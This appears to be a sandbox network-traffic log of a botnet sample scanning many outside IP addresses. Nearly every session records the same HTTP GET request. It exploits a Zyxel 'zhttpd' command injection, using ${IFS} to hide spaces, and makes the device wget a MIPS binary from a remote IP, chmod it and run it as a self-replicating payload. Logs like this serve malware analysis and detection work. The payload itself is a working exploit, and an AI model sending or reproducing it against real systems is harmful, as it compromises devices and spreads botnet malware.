                                    Jan 13, 2024 19:02:31.117736101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3775192.168.2.133618692.231.77.149443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.117799997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3776192.168.2.135069072.21.81.180443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.117829084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3777192.168.2.1355336149.56.80.178443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.117928028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3778192.168.2.1350700126.22.105.6443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.117959976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3779192.168.2.13482104.175.94.23443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.118004084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3780192.168.2.134458889.127.31.123443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.118100882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3781192.168.2.134982862.17.183.112443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.118151903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3782192.168.2.1353516129.141.229.209443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.123109102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3783192.168.2.1339508171.211.96.140443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.123179913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3784192.168.2.1342408102.200.105.160443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.123253107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3785192.168.2.1347896128.28.245.120443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.123327017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3786192.168.2.1339236154.134.157.235443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.123405933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3787192.168.2.1354658190.55.107.50443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.123469114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3788192.168.2.135178840.1.160.71443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.122620106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3789192.168.2.1335926198.12.108.100443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.122663021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3790192.168.2.13463769.115.2.2443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.122713089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3791192.168.2.1346704130.153.16.123443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.122735977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3792192.168.2.13488942.41.247.231443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.122769117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3793192.168.2.1333396117.148.73.69443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.122827053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3794192.168.2.1358206106.164.235.113443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.122867107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3795192.168.2.1353568138.14.245.117443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.122908115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3796192.168.2.133505281.183.77.30443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.122937918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3797192.168.2.1359484182.35.117.174443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.122998953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3798192.168.2.1337000200.124.74.163443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.123044968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3799192.168.2.1346710112.197.221.192443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.123084068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3800192.168.2.1346438183.134.146.149443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.123137951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3801192.168.2.1337550104.141.119.212443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.123186111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3802192.168.2.134643024.237.128.241443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.123186111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3803192.168.2.134339062.18.146.42443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.123251915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3804192.168.2.135386269.151.194.132443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.123265982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3805192.168.2.133650269.219.163.6443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.123320103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3806192.168.2.1335108133.55.230.6443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.123362064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3807192.168.2.1349802119.63.152.115443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.123404026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3808192.168.2.1343872126.111.15.165443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.123436928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3809192.168.2.1343826171.235.68.177443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.123480082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3810192.168.2.13348109.121.141.71443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.123522997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3811192.168.2.134391241.9.67.226443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.123549938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3812192.168.2.1334892145.224.37.116443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.123595953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3813192.168.2.134028639.146.66.117443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.123627901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3814192.168.2.1335224218.225.88.86443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.123657942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3815192.168.2.1358444114.98.145.223443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.123693943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3816192.168.2.1338556180.180.194.30443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.123724937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3817192.168.2.1340678162.63.74.96443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.123790026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3818192.168.2.136092464.131.198.235443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.123820066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3819192.168.2.1354086131.74.254.94443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.123830080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3820192.168.2.135595024.222.1.50443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.123904943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3821192.168.2.1347716157.236.226.213443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.123953104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3822192.168.2.1339162124.201.202.69443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.123959064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3823192.168.2.133617686.132.39.96443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.124011993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3824192.168.2.1358724198.157.184.201443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.124044895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3825192.168.2.1342190223.155.29.228443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.124074936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3826192.168.2.134515440.139.28.27443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.124109030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3827192.168.2.135475852.12.206.142443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.124165058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3828192.168.2.135899238.86.70.219443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.124222040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3829192.168.2.1353156140.115.151.9443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.124262094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3830192.168.2.1347992193.232.85.34443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.124288082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3831192.168.2.133663650.87.153.84443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.124330997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3832192.168.2.1343574192.218.219.73443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.124407053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3833192.168.2.1333490204.129.58.51443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.124408007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3834192.168.2.135079098.252.131.73443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.124459028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3835192.168.2.134591464.228.191.24443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.124494076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3836192.168.2.134448447.27.198.32443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.124516010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3837192.168.2.13329148.22.204.118443
                                    TimestampBytes transferredDirectionData
